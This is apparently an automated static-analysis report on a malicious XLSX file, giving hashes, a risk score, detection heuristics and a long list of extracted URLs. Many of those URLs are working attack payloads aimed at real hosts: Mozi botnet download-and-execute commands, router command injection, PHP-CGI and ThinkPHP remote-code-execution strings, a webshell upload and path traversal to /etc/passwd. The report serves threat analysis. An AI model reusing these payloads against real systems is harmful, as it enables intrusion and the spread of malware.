Malicious Office (OOXML) / .XLSX — malware analysis report

Static analysis result for SHA-256 921d82b61e1f74ce…

MALICIOUS

Office (OOXML) / .XLSX

103.2 KB Created: 2015-06-06 18:17:00 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2026-06-11
MD5: 531c593cf079693d88389266de19ebbb SHA-1: ce3aea73f08b130bf509392e59d854a6a39d909c SHA-256: 921d82b61e1f74ce7d126cde8c16fa08c0526b9cbd6974bbe1bd41b68dbb1ae8
82 Risk Score

Heuristics 3

  • LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
  • Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE
    Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://139.155.1.167/blink;chmod In document text (OOXML body / shared strings)
    • http://93.123.85.195/awoo.shIn document text (OOXML body / shared strings)
    • http://5.59.248.206/8UsA.shIn document text (OOXML body / shared strings)
    • http://n666888.comIn document text (OOXML body / shared strings)
    • http://59.88.13.175:41611/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1In document text (OOXML body / shared strings)
    • https://oa.gsafety.comIn document text (OOXML body / shared strings)
    • https://oa.gsafety.com/seeyon/cap4/businessTemplateController.do?method=formContent&type=edit&rightId=4788189786377569598.-1262784746319100283&moduleId=8742869548637047001&formTemplateId=-7500689792583318487&columnId=-7500689792583318487&moduleType=42In document text (OOXML body / shared strings)
    • https://101.91.191.15:7990In document text (OOXML body / shared strings)
    • https://101.91.191.15:7990/projects/YJKFRJ2020005/repos/disaster_app/branches?base=master_fixIn document text (OOXML body / shared strings)
    • http://139.155.1.167/blinkIn document text (OOXML body / shared strings)
    • https://jkxd.jxtii.cn/In document text (OOXML body / shared strings)
    • http://jxfy.gov.cn/api/shell.jspxIn document text (OOXML body / shared strings)
    • http://185.196.10.231/shIn document text (OOXML body / shared strings)
    • https://www.jxcdc.cn/mobile/api/api.ali.phpIn document text (OOXML body / shared strings)
    • https://www.jxcdc.cn/php-cgi/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://inputIn document text (OOXML body / shared strings)
    • https://117.21.210.193/portal/redlionIn document text (OOXML body / shared strings)
    • http://localhost_x000D_In document text (OOXML body / shared strings)
    • http://www.jxcdc.cn/?tag/index=&tag={pbohome/Indexot:if(1)(usort/*%3e*/(post/*%3e*/(/*%3e*/1),create_function/*%3e*/(/*%3e*/post/*%3e*/(/*%3e*/2),post/*%3e*/(/*%3e*/3))));//)}(123){/pbhome/Indexoot:if}&tagstpl=news.html&lnoc2tspfar1_ue_x000D_In document text (OOXML body / shared strings)
    • https://www.jxcdc.cn/?tag/index=&tag={pbohome/Indexot:if(1)(usort/*%3e*/(post/*%3e*/(/*%3e*/1),create_function/*%3e*/(/*%3e*/post/*%3e*/(/*%3e*/2),post/*%3e*/(/*%3e*/3))));//)}(123){/pbhome/Indexoot:if}&tagstpl=news.html&lnoc2tspfar1_ueIn document text (OOXML body / shared strings)
    • https://117.21.210.193/HNAP1In document text (OOXML body / shared strings)
    • http://www.jxcdc.cn/utility/convert/index.php?a=config&source=d7.2_x2.0_x000D_In document text (OOXML body / shared strings)
    • https://www.jxcdc.cn/utility/convert/index.php?a=config&source=d7.2_x2.0In document text (OOXML body / shared strings)
    • http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawsIn document text (OOXML body / shared strings)
    • http://www.jxcdc.cn/admin/commodtiy/file.php?upload=1_x000D_In document text (OOXML body / shared strings)
    • https://www.jxcdc.cn/admin/commodtiy/file.php?upload=1In document text (OOXML body / shared strings)
    • http://purenetworks.com/HNAP1/`cdIn document text (OOXML body / shared strings)
    • http://175.172.153.168:60031/Mozi.mIn document text (OOXML body / shared strings)
    • http://purenetworks.com/HNAP1/In document text (OOXML body / shared strings)
    • http://11.162.236.163:6666In document text (OOXML body / shared strings)
    • http://192.168.1.1:8088/Mozi.m+-O+-In document text (OOXML body / shared strings)
    • http://111.61.103.83:37999/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1In document text (OOXML body / shared strings)
    • http://76.81.220.226:43690/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1In document text (OOXML body / shared strings)
    • http://221.15.160.190:47016/Mozi.mIn document text (OOXML body / shared strings)
    • http://192.168.1.1:8088/Mozi.mIn document text (OOXML body / shared strings)
    • http://123.14.111.248:36238/Mozi.mIn document text (OOXML body / shared strings)
    • http://101.132.167.122/_x000D_In document text (OOXML body / shared strings)
    • http://www.163.cn/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=xxhxl.php&vars[1][]=djsjxbei37$In document text (OOXML body / shared strings)
    • https://www.hbpts.com.cn/In document text (OOXML body / shared strings)
    • https://www.hbpts.com.cn/syscmd.htmIn document text (OOXML body / shared strings)
    • https://www.hbpts.com.cn/console/images/%252e%252e%252fconsole.portalIn document text (OOXML body / shared strings)
    • http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1In document text (OOXML body / shared strings)
    • https://www.bdebid.com/utility/convert/index.php?a=config&source=d7.2_x2.0In document text (OOXML body / shared strings)
    • https://www.ccs-ibidding.com/cms/channel/zd1=ywgg1/index.htm?pageNo=1In document text (OOXML body / shared strings)
    • https://www.ccs-ibidding.com/In document text (OOXML body / shared strings)
    • http://www.ahptc.cn/Ueditor/net/controller.ashx?action=catchimageIn document text (OOXML body / shared strings)
    • http://www.163.cn/OfficeManagement/RegisterManager/Upload.aspxIn document text (OOXML body / shared strings)
    • https://www.hbpts.com.cn/seeyon/logs/login.logIn document text (OOXML body / shared strings)
    • https://www.hbpts.com.cn/forum/phpmyadmin/scripts/setup.phpIn document text (OOXML body / shared strings)
    • https://www.hbpts.com.cn/index.phpIn document text (OOXML body / shared strings)
    • https://www.hbpts.com.cn/etc/passwdIn document text (OOXML body / shared strings)
    +47 more URL(s)

Open this report in the interactive analyzer, or submit your own file for analysis.